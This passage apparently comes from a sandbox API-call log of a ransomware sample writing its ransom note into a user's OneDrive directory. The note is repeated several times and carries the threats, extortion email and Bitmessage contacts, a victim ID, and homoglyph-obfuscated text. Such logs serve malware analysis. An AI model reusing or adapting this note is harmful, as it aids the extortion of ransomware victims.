lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.123] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n¨C\x0e\x08¸´ês©&\n1\x02#ý{z£d-º°\x03\r", lpUsedDefaultChar=0x0) returned 8717 [0300.123] WriteFile (in: hFile=0x2d4, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0300.124] CloseHandle (hObject=0x2d4) returned 1 [0300.124] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\si-lk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\si-lk\\#readme_eman#.rtf")) returned 0xffffffff [0300.124] GetLastError () returned 0x2 [0300.124] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\si-lk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\si-lk\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0300.125] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW 